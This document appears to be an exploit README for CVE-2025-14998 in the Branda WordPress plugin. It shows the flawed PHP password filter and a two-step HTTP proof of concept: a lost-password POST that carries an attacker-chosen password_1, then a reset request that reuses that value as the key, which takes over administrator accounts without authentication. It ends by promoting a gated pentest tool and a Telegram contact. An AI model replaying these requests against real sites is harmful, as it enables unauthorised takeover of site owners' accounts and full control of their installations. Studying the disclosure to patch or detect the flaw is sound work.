# Wordpress Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover

[CVE-2025-14998](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14998) The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.

For more wordpress vulnerabilities and exclusive pentest tools contact me on telegram [@KtN1990](https://t.me/KtN1990).

## 🔍 Root Cause Analysis

The plugin overrides WordPress’s password generation logic by hooking into the
`random_password` filter. Instead of allowing WordPress to generate a secure
random password, the plugin replaces it with user-controlled input.

### Vulnerable Code

```php
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}
```

## 🧪 Proof of Concept (Sanitized)

### Step 1 — Trigger Password Reset with Arbitrary Password

```http
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
```

The value of `password_1` can be any attacker-controlled string.

---

### Step 2 — Complete Reset Using the Same Value as the Reset Key

```http
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
```

---

## ✅ Result

- WordPress accepts the attacker-controlled password
- The administrator password is changed
- The attacker can authenticate as the affected user

No email access or valid password reset token is required.

---

## 💥 Impact

An unauthenticated attacker can:

- Reset passwords for any WordPress user
- Take over administrator accounts
- Gain full control of the WordPress installation
- Modify plugins, themes, or content

## Contact

- [@KtN1990](https://t.me/KtN1990)
  
## More vulnerabilities, Check Megatron!

![Logo](https://raw.githubusercontent.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit/main/files/megatron.jpg)

- 💣 What is Megatron? Megatron is an advanced penetration testing tool designed for serious testers and red teamers. Whether you're auditing, scanning, or testing infrastructures, Megatron gives you the power you need.

-🛡️ Ideal for:
– Security researchers
– Penetration testers
– Ethical hackers

- 📦  aintained line with ~230 legacy research modules; recent scanner core improvements for stability and detection.

- 🎯 Purpose: Provided strictly for authorized security testing, education, defensive research, and red-team training. This release is not for unlawful use. Distribution is gated — access only after verification and a signed Responsible Use Agreement / NDA.

-🛡 Responsible access policy (summary):

1. Access only to verified security professionals, corporate security teams, accredited labs, or training providers.
2. You must provide org name, role, official email (corporate), and lawful purpose.
3. Full download granted only after verification and signing our Responsible Use Agreement / NDA.
4. Zero tolerance for misuse — evidence of malicious use results in revocation and reporting where required.


- 📩 Contact / Requests / Verification: @KtN1990 — include organization, role, and short reason for access. [Telegram Channel](https://t.me/MEGATRON_NEWS)



## Demo

[![IMAGE ALT TEXT HERE](https://i.ytimg.com/vi_webp/irrh91Iaz7c/mqdefault.webp)](https://www.youtube.com/watch?v=irrh91Iaz7c)

## License

[MIT](https://choosealicense.com/licenses/mit/)
